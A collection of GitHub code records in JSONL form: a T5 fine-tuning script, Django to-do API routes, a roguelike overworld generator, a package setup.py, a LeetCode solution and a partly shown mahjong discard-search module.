+{"seq_id":"38160948795","text":"from ttt import *\n\nif __name__ == '__main__':\n args = get_args()\n ## uncomment if debugging\n # logger.info(f\"args: {json.dumps(args.__dict__, indent=2)}\")\n # ############### customize args\n # args.use_gpu = True\n # # args.use_tpu = True\n # # args.tpu_address = \"x.x.x.x\"\n # args.do_train = True\n # args.use_tb = True\n # # any one from MODELS_SUPPORT (check:ttt/args.py)\n # args.model_select = \"t5-base\"\n # # select a dataset. First check if it is from nlp, if yes load it here and save locally to the data_path\n # # or customize a dataset in the data_path (train.json, val.json, test.json) where examples are organised in jsonl format\n # # each line represents an example like this: {\"text\": \"...\", \"label\": \"...\"}\n # args.data_path = \"data/final\"\n # # any one from TASKS_SUPPORT (check:ttt/args.py)\n # args.task = \"t2t\"\n # args.log_steps = -1\n # # set do_eval = False if your data does not contain a validation set. In that case, patience and early_stop will have no effect\n # args.do_eval = True\n # args.eval_batch_size=32\n # args.per_device_train_batch_size=8\n # args.num_epochs_train=12\n # args.source_field_name = \"source\"\n # args.target_field_name = \"target\"\n # args.max_src_length = 512\n # args.max_tgt_length = 512\n # args.task = \"translation\" # translation here generalizes to all source-target like tasks\n # args.lr=5e-5\n # # any one from LR_SCHEDULER_SUPPORT (check:ttt/args.py)\n # args.scheduler = \"warmuplinear\"\n ############### end customize args\n # to have a sanity check for the args\n sanity_check(args)\n # seed everything, make deterministic\n set_seed(args.seed)\n tokenizer = get_tokenizer(args)\n inputs = get_inputs(tokenizer, args)\n model, strategy = create_model(args, logger, get_model)\n # start training, here we customize T2TTrainer to get more control and flexibility\n trainer = T2TTrainer(args)\n trainer.train(model, strategy, tokenizer, inputs)\n","repo_name":"wangcongcong123/ttt","sub_path":"covid_event/finetune.py","file_name":"finetune.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"40"}
+{"seq_id":"20162998078","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.ApiOverView),\n path('task_list/', views.TaskList, name= 'task_list'),\n path('task_detial/<int:pk>/', views.TaskDetialView, name='task_detial'),\n path('task_create/', views.TaskCreateView, name= 'task_create'),\n path('task_update/<int:pk>/', views.TaskUpdateview, name='task_update'),\n path('task_delete/<int:pk>/', views.TaskDelete, name='task_delete'),\n]\n","repo_name":"amanchaurasia512/ToDolist_DRF","sub_path":"ToDolistapps/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"11988451230","text":"import libtcodpy as libtcod\nimport math,random,copy\nfrom config import *\n\nfrom util import *\n\nclass OverworldTile:\n\n\tchar='.'\n\tx=0\n\ty=0\n\tblocked=False\n\t\n\tforeColor=None\n\tbackColor=None\n\t\n\tseen=False\n\t\n\tdef __init__(self,x,y):\n\t\tself.x=x\n\t\tself.y=y\n\t\t\n\tdef setChar(self,char): \n\t\tself.char=char\n\t\t\n\tdef setColors(self,fore,back):\n\t\tself.foreColor=fore\n\t\tself.backColor=back\n\t\t\n\tdef setBlocked(self,blocked): \n\t\tself.blocked=blocked\n\t\t\n\tdef isBlocked(self): return self.blocked\n\tdef isSeen(self): return self.seen\n\tdef gotSeen(self): self.seen=True\n\t\t\n\tdef draw(self,console,offset_x,offset_y):\n\t\tif not self.seen: return\n\t\tlibtcod.console_put_char_ex( console, self.x-offset_x, self.y-offset_y, self.char, self.foreColor, self.backColor)\n\t\t\n\t\t\nclass OverworldTileEntity:\n\n\tchar='#'\n\tx=0\n\ty=0\n\t\n\tforeColor=None\n\tbackColor=None\n\t\n\tdef __init__(self,x,y):\n\t\tself.x=x\n\t\tself.y=y\n\t\t\n\tdef setChar(self,char): \n\t\tself.char=char\n\t\t\n\tdef setColors(self,fore,back):\n\t\tself.foreColor=fore\n\t\tself.backColor=back\n\t\t\n\tdef position(self): return (self.x,self.y)\n\t\t\n\tdef draw(self,console,offset_x,offset_y):\n\t\t\n\t\tlibtcod.console_put_char_ex( console, self.x-offset_x, self.y-offset_y, self.char, self.foreColor, self.backColor)\n\nclass Overworld:\n\t\n\tlevel=None\n\tconsole=None\n\t\n\twidth=0\n\theight=0\n\t\n\tpathable=[]\n\tblockedMap=[]\n\t\n\tplayer=None\n\ttile_entity=[]\n\ttown=None\n\t\n\tdef 
render(self):\n\t\tc=self.console\n\t\tlibtcod.console_clear(c)\n\t\twx=cfg.SCREEN_WIDTH\n\t\twy=cfg.SCREEN_HEIGHT\n\t\t\n\t\tself.playerReveal()\n\t\toffset_x=self.player.x-cfg.WID2\n\t\tif offset_x+wx > self.width: offset_x=self.width-wx\n\t\tif offset_x<0: offset_x=0\n\t\t\n\t\toffset_y=self.player.y-cfg.HGT2\n\t\tif offset_y+wy > self.height: offset_y=self.height-wy\n\t\tif offset_y<0: offset_y=0\n\t\t\n\t\tfor x in xrange(wx):\n\t\t\tfor y in xrange(wy):\n\t\t\t\tself.level[offset_x+x][offset_y+y].draw(c,offset_x,offset_y)\n\t\t\t\t\n\t\tfor entity in self.tile_entity:\n\t\t\tpos=entity.position()\n\t\t\t#if self.level[pos[0]][pos[1]].seen: entity.draw(c,offset_x,offset_y)\n\t\t\tentity.draw(c,offset_x,offset_y)\n\t\t\t\t\n\t\tself.player.draw(c,offset_x,offset_y)\n\t\t\t\t\n\t\tlibtcod.console_blit(self.console,0,0,wx,wy,0,0,0)\n\t\t\n\tdef playerReveal(self):\n\t\tsight=15\n\t\tlibtcod.map_compute_fov(self.blockedMap,self.player.x,self.player.y,sight,True)\n\t\tself.level[self.player.x][self.player.y].gotSeen()\n\t\twx=cfg.WID2\n\t\twy=cfg.HGT2\n\t\tfor x in xrange(self.player.x-wx,self.player.x+wx):\n\t\t\tfor y in xrange(self.player.y-wy,self.player.y+wy):\n\t\t\t\tif libtcod.map_is_in_fov(self.blockedMap, x, y):\n\t\t\t\t\tself.level[x][y].gotSeen()\n\t\n\tdef playerStart(self,player):\n\t\tself.player=player\n\t\ttownPos=self.town.position()\n\t\tself.player.setPosition(townPos[0],townPos[1])\n\t\tself.player.newLevel(self)\n\t\t\n\tdef buildBlockedMap(self):\n\t\tbmap = libtcod.map_new(self.width,self.height)\n\t\t\n\t\tfor x in xrange(self.width):\n\t\t\tfor y in xrange(self.height):\n\t\t\t\tif self.level[x][y].blocked:\n\t\t\t\t\tlibtcod.map_set_properties(bmap,x,y,False,False)\n\t\t\t\telse:\n\t\t\t\t\tlibtcod.map_set_properties(bmap,x,y,True,True)\n\t\t\n\t\tself.blockedMap=bmap\n\t\t\n\tdef getWidth(self): return self.width\n\tdef getHeight(self): return self.height\n\t\n\tdef getBlockedMap(self): return self.blockedMap\n\tdef getPathable(self): return self.pathable\n\tdef isPathable(self,x,y): return (x,y) in self.pathable\n\tdef isSeen(self,x,y): return self.level[x][y].isSeen()\n\tdef isBlocked(self,x,y): return self.level[x][y].isBlocked()\n\t\n\tdef putThing(self,x,y,char=\"+\"): #debug\n\t\trlist=copy.copy(self.tile_entity)\n\t\tfor e in rlist:\n\t\t\tif e.position()==(x,y):\n\t\t\t\tself.tile_entity.remove(e)\n\t\t\t\t\n\t\tthing=OverworldTileEntity(x,y)\n\t\tthing.setChar(char)\n\t\tthing.setColors(libtcod.Color(random.randint(0,255), random.randint(0,255), random.randint(0,255)),libtcod.Color(0, 0, 0))\n\t\tself.tile_entity.append(thing)\n\t\t\n\tdef findPathable(self):\n\t\tself.pathable=[]\n\t\tw=self.width\n\t\th=self.height\n\t\tstart=(random.randint(1,w-1),random.randint(1,h-1))\n\t\twhile self.level[start[0]][start[1]].isBlocked(): start=(random.randint(1,w-1),random.randint(1,h-1))\n\t\t\n\t\topenlist=[]\n\t\topenlist.append(start)\n\t\tself.pathable.append(start)\n\t\t#rels=((1,1),(1,-1),(-1,1),(-1,-1))\n\t\trels=((0,1),(0,-1),(-1,0),(1,0))\n\t\t\n\t\twhile len(openlist):\n\t\t\tnewlist=copy.copy(openlist)\n\t\t\tfor coord in openlist:\n\t\t\t\tfor rel in rels:\n\t\t\t\t\tcrd=(coord[0]+rel[0],coord[1]+rel[1])\n\t\t\t\t\tif crd[0]<0 or crd[0]>=w or crd[1]<0 or crd[1]>=h: continue\n\t\t\t\t\tif self.level[crd[0]][crd[1]].isBlocked(): continue\n\t\t\t\t\t\n\t\t\t\t\tif crd not in self.pathable:\n\t\t\t\t\t\tnewlist.append(crd)\n\t\t\t\t\t\tself.pathable.append(crd)\n\t\t\t\tnewlist.remove(coord)\n\t\t\t\t\n\t\t\topenlist=copy.copy(newlist)\n\t\t\t\n\tdef 
clearUnpathableAreas(self):\n\t\tw=self.width\n\t\th=self.height\n\t\tfor x in xrange(w):\n\t\t\tfor y in xrange(h):\n\t\t\t\tif self.level[x][y].blocked: continue\n\t\t\t\tif not (x,y) in self.pathable:\n\t\t\t\t\tself.level[x][y].setBlocked(True)\n\t\t\n\tdef create(self):\n\t\tw=self.width=cfg.OW_WIDTH\n\t\th=self.height=cfg.OW_HEIGHT\n\t\tth=cfg.OW_TREE_THRES\n\t\t\n\t\tself.level=[[OverworldTile(j,i) for i in xrange(h)] for j in xrange(w)]\n\t\tself.console=libtcod.console_new(w,h)\n\n\t\tbackColor=libtcod.Color(0, 0, 0)\n\t\t\n\t\tnoise2d = libtcod.noise_new(2)\n\t\t\n\t\tfor x in xrange(w):\n\t\t\tfor y in xrange(h):\n\t\t\t\tzoom=0.09\n\t\t\t\tf = [zoom * x,zoom * y]\n\t\t\t\tval = libtcod.noise_get(noise2d,f)\n\t\t\t\tc1=int((((val*-1)+1)/2)*30)\n\t\t\t\tc2=10+int(((val+1)/2)*20)\n\t\t\t\t\n\t\t\t\tif val>th:\t\t\t\t\n\t\t\t\t\tself.level[x][y].setChar(23)\n\t\t\t\t\tself.level[x][y].setColors(libtcod.Color(0, 200, 0),libtcod.Color(0, 0, 0))\n\t\t\t\t\tself.level[x][y].setBlocked(True)\n\t\t\t\telse:\n\t\t\t\t\tself.level[x][y].setChar(176)\n\t\t\t\t\tself.level[x][y].setColors(libtcod.Color(0, c1, 0),libtcod.Color(0, c2, 0))\n\t\t\n\t\t\n\t\twhile len(self.pathable)<400: self.findPathable()\n\t\tself.clearUnpathableAreas()\n\t\t#self.findPathable() # Now a final scan for the full area\n\t\t\t\n\t\t# Place town\n\t\t\n\t\ttown_pos=random.choice(self.pathable)\n\t\ttown=OverworldTileEntity(town_pos[0],town_pos[1])\n\t\ttown.setColors(libtcod.Color(0, 100, 150),libtcod.Color(40, 40, 0))\n\t\tself.tile_entity.append(town)\n\t\tself.town=town\n\t\t\n\t\t# Place dungeons\n\t\t\n\t\tfor i in xrange(cfg.DUNGEONS):\n\t\t\n\t\t\tvalidLocation=False\n\t\t\tpos=None\n\t\t\twhile not validLocation:\n\t\t\t\tvalidLocation=True\n\t\t\t\tpos=random.choice(self.pathable)\n\t\t\t\tfor entity in self.tile_entity:\n\t\t\t\t\tif entity.position()==pos:\n\t\t\t\t\t\tvalidLocation=False\n\t\t\t\t\n\t\t\tdungeon=OverworldTileEntity(pos[0],pos[1])\n\t\t\tdungeon.setColors(libtcod.Color(200, 0, 0),libtcod.Color(40, 0, 0))\n\t\t\tself.tile_entity.append(dungeon)\n\t\t\t\n\t\tself.buildBlockedMap()","repo_name":"jdau/adungeon","sub_path":"overworld.py","file_name":"overworld.py","file_ext":"py","file_size_in_byte":6393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"20362706366","text":"import setuptools\n\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"dopyapi\",\n version=\"0.0.1\",\n author=\"Mouhsen Ibrahim\",\n author_email=\"mouhsen.ibrahim@gmail.com\",\n description=\"Python Library to access Digital Ocean API\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/mohsenSy/dopyapi\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: GNU General Public License v3.0\",\n \"Operating System :: OS Independent\",\n ],\n install_requires = [\n 'requests',\n 'requests-oauthlib'\n ],\n python_requires='>=3.6',\n)\n","repo_name":"mohsenSy/dopyapi","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"11713396034","text":"class Solution:\n def gcdOfStrings(self, str1: str, str2: str) -> str:\n a = min(len(str1), len(str2))\n \n while a >= 1:\n if str1[:a] == str2[:a] and str1[:a] * (len(str1) // a) == str1 and 
str2[:a] * (len(str2) // a) == str2:\n return str1[:a]\n a -= 1\n \n return \"\"\n \n ","repo_name":"wongruiyang/leetcode-grind","sub_path":"1071-greatest-common-divisor-of-strings/1071-greatest-common-divisor-of-strings.py","file_name":"1071-greatest-common-divisor-of-strings.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"38666617683","text":"# -*- coding:utf-8 -*-\n# cython: language_level=2\n# bug: some branches of the recursive iteration return nothing, so no value comes back\n# input: a single-suit hand, 9^5 possibilities\n# python 2.0: dividing two integers truncates automatically, so the dividend must be cast to float by hand\n'''\nImproved version\n2020.08.05\nGold-coin room version\ntodo: time cost of the evaluation module\n\nA partial set (dazi) is broken up when its number of effective tiles is 0\nor when there are more partial sets than are needed\n'''\n\nimport copy\nimport numpy as np\nimport time\n\n# import numpy as np\nimport math\nfrom mah_tool.so_lib import lib_MJ as MJ\nimport logging as logger\nfrom mah_tool.so_lib import opp_srmj as DFM\nimport datetime\nimport random\n# import thread\nimport os\n\n# logger = logging.getLogger(\"SRMJ_log\")\n# logger.setLevel(level=logging.DEBUG)\n# # log_path = \"/home/tonnn/recommondsrv_qipai/app/recommond/shangraoMJ/\"\n# # log_file = \"shangraoMJlog.txt\"\n# # if not os.path.isfile(log_path):\n# # os.mknod(log_path) # windows has no mknod\n# # os.mkdir(log_path)\n# # with open(os.path.join(log_path,log_file),'a+') as fp:\n# #\n# # fp.close()\n#\n# # handler = logging.FileHandler(\"/home/tonnn/recommondsrv_qipai/app/recommond/shangraoMJ/shangraoMJlog.txt\")\n# time_now = datetime.datetime.now()\n# # log_path = \"./%i_log.txt\"%time_now.day\n# # print log_path\n# handler = logging.FileHandler(\"./%i%i%i_log.txt\" % (time_now.year, time_now.month, time_now.day))\n#\n# handler.setLevel(logging.INFO)\n#\n# formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n# handler.setFormatter(formatter)\n#\n# logger.addHandler(handler)\n# logger.info(\"compile finished...\")\n\n# global variable\nTIME_START = time.time()\n\nw_ways = 1\nw_aa = (1 + 3 * w_ways + 4)\nw_ab = (1 + w_ways)\nw_type = 0\nROUND = 0\nt3Set = MJ.get_t3info()\nt2Set, t2Efc, efc_t2index = MJ.get_t2info()\n\nT_SELFMO = [0] * 34 # self-draw table: probability that a tile is still in the wall\nLEFT_NUM = [0] * 34 # count of each tile not yet seen\nRT1 = [[0] * 34, [0] * 34] # danger tables\nRT2 = [[0] * 34, [0] * 34]\nRT3 = [[0] * 34, [0] * 34]\n\nt1tot2_dict = {}\nt1tot3_dict = {}\nt2tot3_dict = {}\n\n'''\nDraw-node class\nPurpose: keeps the information of a draw node, including the drawn tile, its draw probability, all tiles drawn and discarded along this path, and the sz (sequences), kz (triplets) and jiang (pair) formed on this path\n'''\n\n\nclass CatchNode:\n def __init__(self, cards=[], catchCard=None, leftNum=[], remainNum=136, t2=[], level=0, kingCard=None, t2N=[],\n ocards=[], baoHuanYuan=0):\n \"\"\"\n Initialize the instance variables.\n :param cards: hand tiles\n :param catchCard: the drawn tile\n :param leftNum: list with the remaining count of each tile\n :param remainNum: total number of remaining tiles\n :param t2: the partial set the draw completes\n :param level: depth in the search tree\n :param ocards: discard-strategy set of this path\n :param t2N: expansion set of the draw node\n :param kingCard: the king (joker) tile\n \"\"\"\n self.type = 2\n self.cards = cards\n self.leftNum = leftNum\n self.catchCard = catchCard\n self.rate = 1\n if catchCard != None: # compute the draw probability\n if len(t2) == 1: # single tile, completing the pair\n if t2[0] == kingCard: # king-wait (joker hu) handling\n self.rate = 1\n else: # drawing the pair tile without a king\n self.rate = float(\n leftNum[convert_hex2index(catchCard)]) / remainNum * 1\n elif len(t2) == 2:\n if t2[0] == t2[1]:\n self.rate = float(leftNum[convert_hex2index(catchCard)]) / remainNum * 8\n else:\n self.rate = float(leftNum[convert_hex2index(catchCard)]) / remainNum * 2\n else:\n pass\n # print('CatchNode Error 2!', catchCard, t2)\n # print catchCard ,t2, self.rate\n # if self.rate==0:\n # print ('rate=0,catchCard',catchCard)\n self.t2 = t2\n self.level = level # depth in the tree\n\n self.kz = []\n self.sz = []\n self.jiang = 0x00\n self.parent = None # todo: could be kept in a hash table, which might be faster\n self.children = []\n self.formerCatchCards = []\n self.formerOutCards = []\n # extra king-tile bookkeeping\n self.kingCard = kingCard\n self.feiKingNum = 0 # number of kings discarded\n # self.noUseKingNum=0 # number of kings not yet used\n # self.usingKing=0 #\n self.baoHuanYuan = baoHuanYuan\n self.addKing = False\n self.t2N = t2N\n self.ocards = ocards\n self.firstOutCard = 0x00\n\n # def ac(self,t2):\n # if t2[0]+2==t2[1]:\n # return True\n # elif\n\n def setParent(self, parent):\n \"\"\"\n Set the parent node.\n :param parent: the parent node\n \"\"\"\n self.parent = parent\n\n def addChild(self, child):\n \"\"\"\n Add a child node.\n :param child: the child node\n \"\"\"\n self.children.append(child)\n\n def equal(self, newNode):\n \"\"\"\n Check whether the given node is the same node as this one.\n :param newNode: the node to compare against\n :return: bool, whether they are the same\n \"\"\"\n if newNode.catchCard == self.catchCard and newNode.kz == self.kz and newNode.sz == self.sz and newNode.jiang == self.jiang:\n return True\n\n return False\n\n def __repr__(self):\n # fixed: __repr__ must return a string, not a tuple\n return \"CatchNode({}, {}, {}, {})\".format(self.type, self.cards, self.catchCard, self.level)\n\n def nodeInfo(self):\n print('type', self.type, 'cards', self.cards, 'catchCard', self.catchCard, 'rate', self.rate, 't2', self.t2,\n 'level', self.level, 'ocards', self.ocards, 't2N', self.t2N, 'kz', self.kz, 'sz', self.sz, 'jiang',\n self.jiang, 'formerCatchCards', self.formerCatchCards, 'formerOutCards', self.formerOutCards, 'kingCard',\n self.kingCard, 'baoHuanYuan', self.baoHuanYuan)\n\n\n'''\nDiscard-node class\nPurpose: keeps the information of a discard node, including the discarded tile, its danger level, all tiles discarded and drawn along this path, and the sz, kz and jiang formed on this path\n'''\n\n\nclass OutNode:\n def __init__(self, cards=[], outCard=[], level=0, dgRate=[], kingCard=None, t2N=[], ocards=[], baoHuanYuan=0):\n \"\"\"\n Initialize the discard-node instance variables.\n :param cards: hand tiles\n :param outCard: the discarded tile\n :param level: depth in the search tree\n :param ocards: discard-strategy set of this path\n :param t2N: draw-strategy set of this path\n :param dgRate: danger-probability table\n :param kingCard: the king (joker) tile\n \"\"\"\n self.type = 1\n self.cards = cards\n self.outCard = outCard\n self.level = level # depth in the tree\n self.parent = None\n self.children = []\n self.kz = []\n self.sz = []\n self.jiang = 0x00\n\n self.formerCatchCards = []\n self.formerOutCards = []\n self.rate = dgRate[convert_hex2index(outCard)] # danger probability\n # extra king-tile bookkeeping\n self.kingCard = kingCard\n self.feiKingNum = 0\n self.addKing = False\n self.t2N = t2N\n self.ocards = ocards\n self.baoHuanYuan = baoHuanYuan\n self.firstOutCard = 0x00\n\n def setParent(self, parent):\n \"\"\"\n Set the parent node.\n :param parent: the parent node\n \"\"\"\n self.parent = parent\n\n def addChild(self, child):\n \"\"\"\n Add a child node.\n :param child: the child node\n \"\"\"\n self.children.append(child)\n\n def equal(self, newNode):\n \"\"\"\n Check whether two nodes are the same.\n :param newNode: the node to compare against\n :return: bool, whether they are the same\n \"\"\"\n if newNode.outCard == self.outCard and newNode.kz == self.kz and newNode.sz == self.sz and newNode.jiang == self.jiang:\n return True\n\n return False\n\n def nodeInfo(self):\n \"\"\"\n Print the node information.\n \"\"\"\n print('type', self.type, 'cards', self.cards, 'outCard', self.outCard, 'rate', self.rate, 'level', self.level,\n 'ocards', self.ocards, 't2N', self.t2N, 'kz', self.kz, 'sz', self.sz, 'jiang', self.jiang,\n 'formerCatchCards', self.formerCatchCards, 'formerOutCards', self.formerOutCards, 'kingCard',\n self.kingCard, 'baoHuanYuan', self.baoHuanYuan)\n\n\n'''\nSearch-tree class, used to search for the best discard\n'''\n\n\nclass SearchTree:\n def __init__(self, cards, suits, leftNum, all, remainNum, dgtable, kingCard, feiKingNum=0):\n \"\"\"\n Initialize the instance variables and the root node of the search tree.\n :param cards: hand tiles\n :param suits: melds (fulu)\n :param leftNum: per-tile remaining counts\n :param all: decomposition info\n :param remainNum: total number of remaining tiles\n :param dgtable: danger table\n :param kingCard: the king (joker) tile\n :param feiKingNum: number of kings already discarded\n \"\"\"\n print('leftNum', leftNum)\n print('xts', all[0][4])\n # print('search tree : all',all)\n self.root = CatchNode(cards=cards, catchCard=None, leftNum=leftNum, remainNum=remainNum, t2=[], level=0,\n kingCard=kingCard)\n self.kingNum = cards.count(kingCard)\n self.root.feiKingNum = feiKingNum\n self.kingCard = kingCard\n self.cards = cards\n self.suits = suits\n self.leftNum = leftNum\n self.all = all\n self.xts = all[0][4]\n self.xts_min = all[0][4]\n self.remainNum = remainNum\n self.dgtable = dgtable\n self.stateSet = {}\n self.fei_king = feiKingNum\n # self.op_card=op_card\n # self.type=type\n self.scoreDict = {}\n self.t2Nw_Set = {}\n for suit in suits:\n if suit[0] != suit[1]:\n self.root.sz.append(suit[0])\n else:\n self.root.kz.append(suit[0])\n self.maxScore = [0, 0]\n # CI correction: when t2N overflows, move the lowest-probability 2N into the waste pool\n # CI = copy.deepcopy(all)\n # bl = 4 - len(suits)\n # for a in all:\n # ab = copy.deepcopy(a[3])\n # if a[2]!=[] and self.kingNum==0:\n # lenofT2Set=len(a[2])+len(a[3])-1\n # else:\n # lenofT2Set=len(a[2])+len(a[3])\n # if lenofT2Set>bl-len(a[0])-len(a[1]):\n # CI.remove(a)\n # ab_efc,w=self.get_effective_cards_w(a[3])\n #\n # for i in range(len(w)):\n # ab[i].append(w[i])\n #\n # ab.sort(key=lambda k: k[2], reverse=True)\n # min_ab=[]\n # for ab_ in ab:\n # if ab_[2]==ab[0][2]:\n # min_ab.append([ab_[0],ab_[1]])\n # for m_ab in min_ab:\n # C = copy.deepcopy(a)\n # # print (T2Set[-1])\n # # if ab[-1][0]==ab[-1][1]:\n # # C[2].remove([ab[-1][0],ab[-1][1]])\n # # else:\n # C[3].remove([m_ab[0], m_ab[1]])\n # C[-1].append(m_ab[0])\n # C[-1].append(m_ab[1])\n # CI.append(C)\n #\n # self.all=CI\n # print ('CI',CI)\n self.minList = self.minOut()\n # print (self.all)\n\n def minOut(self):\n # liveness weight of each tile: remaining copies of itself (doubled) plus its neighbours\n minList = [0] * 34\n for i in range(34):\n if i in [0, 9, 18]:\n minList[i] = self.leftNum[i] * 2 + self.leftNum[i + 1] + self.leftNum[i + 2]\n elif i in [8, 17, 26]:\n minList[i] = self.leftNum[i] * 2 + self.leftNum[i - 1] + self.leftNum[i - 2]\n elif i in [1, 10, 19]:\n minList[i] = self.leftNum[i - 1] + self.leftNum[i] * 2 + self.leftNum[i + 1] + self.leftNum[i + 2]\n elif i in [7, 16, 25]:\n minList[i] = self.leftNum[i - 2] + self.leftNum[i - 1] + self.leftNum[i] * 2 + self.leftNum[i + 1]\n elif i >= 27:\n minList[i] = self.leftNum[i]\n else:\n minList[i] = self.leftNum[i - 2] + self.leftNum[i - 1] + self.leftNum[i] * 2 + self.leftNum[i + 1] + \\\n self.leftNum[i + 2]\n return minList\n\n def inChild(self, node, newNode):\n \"\"\"\n Check whether a search-tree node has already been created, used to detect duplicate nodes.\n :param node: the parent node\n :param newNode: the newly created node\n :return: the existing child if already created, else None\n \"\"\"\n # flag=False\n # node is a discard node, its children are draw nodes and the draw is t2\n if node.type == 1:\n for c in node.children:\n if c.equal(newNode):\n return c\n # node is a draw node, its children are discard nodes, i.e. the discarded tile is in the child\n if node.type == 2:\n for c in node.children:\n if c.equal(newNode):\n return c\n return None\n\n def get_effective_cards_w(self, dz_set=[]):\n \"\"\"\n Get the effective tiles and their weights.\n :param dz_set: list of partial sets (dazi)\n :return: list of effective tiles, list of their weights\n \"\"\"\n left_num = self.leftNum\n cards_num = self.remainNum\n effective_cards = []\n w = []\n for dz in dz_set:\n if len(dz) == 1:\n effective_cards.append(dz[0])\n w.append(float(left_num[translate16_33(dz[0])]) / cards_num)\n elif dz[1] == dz[0]:\n effective_cards.append(dz[0])\n w.append(float(\n left_num[translate16_33(dz[0])]) / cards_num * 8.1) # indentation fixed; fatal bug found: the float cast was missing; the weight compensates for a flaw in the evaluation function\n\n elif dz[1] == dz[0] + 1:\n if int(dz[0]) & 0x0F == 1:\n effective_cards.append(dz[0] + 2)\n w.append(float(left_num[translate16_33(dz[0] + 
2)]) / cards_num * 2)\n elif int(dz[0]) & 0x0F == 8:\n effective_cards.append((dz[0] - 1))\n w.append(float(left_num[translate16_33(dz[0] - 1)]) / cards_num * 2)\n else:\n effective_cards.append(dz[0] - 1)\n effective_cards.append(dz[0] + 2)\n w.append(float(left_num[translate16_33(int(dz[0]) - 1)] + left_num[\n translate16_33(int(dz[0]) + 2)]) / cards_num * 2)\n elif dz[1] == dz[0] + 2:\n effective_cards.append(dz[0] + 1)\n w.append(float(left_num[translate16_33(int(dz[0]) + 1)]) / cards_num * 2)\n return effective_cards, w\n\n def getEffectiveCards(self, dz):\n \"\"\"\n 功能:获取搭子的有效牌,用于抓牌结点的扩展\n 思路:特定情景下,计算搭子的有效牌\n :param dz: 搭子\n :return: 有效牌集合\n \"\"\"\n # 获取有效牌,输入为搭子集合,\n combineCards = []\n\n # 单张牌的扩展,todo 只扩展将牌\n if len(dz) == 1:\n fCard = dz[0]\n # combineCards.append([fCard,[fCard, fCard]])\n # if fCard == self.kingCard:\n # combineCards.append([fCard, [fCard, fCard]])\n if fCard > 0x30 or fCard == self.kingCard:\n combineCards.append([fCard, [fCard, fCard]])\n elif fCard & 0x0f == 1:\n combineCards.append([fCard + 1, [fCard, fCard + 1]])\n combineCards.append([fCard + 2, [fCard, fCard + 2]])\n combineCards.append([fCard, [fCard, fCard]])\n elif fCard & 0x0f == 2:\n combineCards.append([fCard - 1, [fCard - 1, fCard]])\n combineCards.append([fCard, [fCard, fCard]])\n combineCards.append([fCard + 1, [fCard, fCard + 1]])\n combineCards.append([fCard + 2, [fCard, fCard + 2]])\n elif fCard & 0x0f == 9:\n combineCards.append([fCard - 2, [fCard - 2, fCard]])\n combineCards.append([fCard - 1, [fCard - 1, fCard]])\n combineCards.append([fCard, [fCard, fCard]])\n elif fCard & 0x0f == 8:\n combineCards.append([fCard - 2, [fCard - 2, fCard]])\n combineCards.append([fCard - 1, [fCard - 1, fCard]])\n combineCards.append([fCard, [fCard, fCard]])\n combineCards.append([fCard + 1, [fCard, fCard + 1]])\n\n else:\n combineCards.append([fCard - 2, [fCard - 2, fCard]])\n combineCards.append([fCard - 1, [fCard - 1, fCard]])\n combineCards.append([fCard, [fCard, fCard]])\n combineCards.append([fCard + 1, [fCard, fCard + 1]])\n combineCards.append([fCard + 2, [fCard, fCard + 2]])\n elif dz[1] == dz[0]:\n combineCards.append([dz[0], [dz[0], dz[0], dz[0]]])\n\n elif dz[1] == dz[0] + 1:\n if int(dz[0]) & 0x0F == 1:\n combineCards.append([dz[0] + 2, [dz[0], dz[0] + 1, dz[0] + 2]])\n elif int(dz[0]) & 0x0F == 8:\n combineCards.append([dz[0] - 1, [dz[0] - 1, dz[0], dz[0] + 1]])\n else:\n combineCards.append([dz[0] - 1, [dz[0] - 1, dz[0], dz[0] + 1]])\n combineCards.append([dz[0] + 2, [dz[0], dz[0] + 1, dz[0] + 2]])\n elif dz[1] == dz[0] + 2:\n combineCards.append([dz[0] + 1, [dz[0], dz[0] + 1, dz[0] + 2]])\n\n return combineCards\n\n def expandNode_2(self, node, ocards, t2N, kingNum=0, kz=[], sz=[]):\n \"\"\"\n 功能:结点扩展方法\n 思路:递归结点扩展,先判断是否已经胡牌,若已经胡牌则停止扩展,再判断是否超过搜索深度,若是则停止扩展\n 对出牌结点进行出牌扩展,直接将出牌集合加入到扩展策略,若本路径的出牌集合已空,则分别将2N或宝牌加入到出牌集合,再次递归。出牌结点创建后需更新所有的出牌结点信息,再次递归\n 对抓牌结点进行抓牌扩展,直接将2N的有效牌加入到抓牌结点,若2N已空,则遍历出牌结点,获取该张牌的邻近牌,加入到2N中,再次递归。抓牌结点创建后,需更新抓牌结点信息,再次递归\n :param node: 本次需扩展的结点\n :param ocards: 出牌集合\n :param t2N: 2N集合\n :param kingNum: 未使用的宝数量\n :param baoHuanYuan: 是否作为宝还原进行扩展\n :param kz: 顺子\n :param sz: 刻子\n :return: 搜索树\n \"\"\"\n # node.nodeInfo()\n\n if len(node.sz) + len(node.kz) == 4 and node.jiang != 0x00:\n # #少搜索一层的奖励,×2概率\n # if self.kingNum!=0:\n # if node.level==self.xts*2:\n # node.rate*=2\n # return\n return\n\n # 宝吊多一层 \n if self.kingNum > 0 and node.feiKingNum + node.baoHuanYuan < self.kingNum + self.fei_king:\n if node.level >= (self.xts + 1) * 2:\n node.rate = 0\n return\n else:\n if node.level >= 
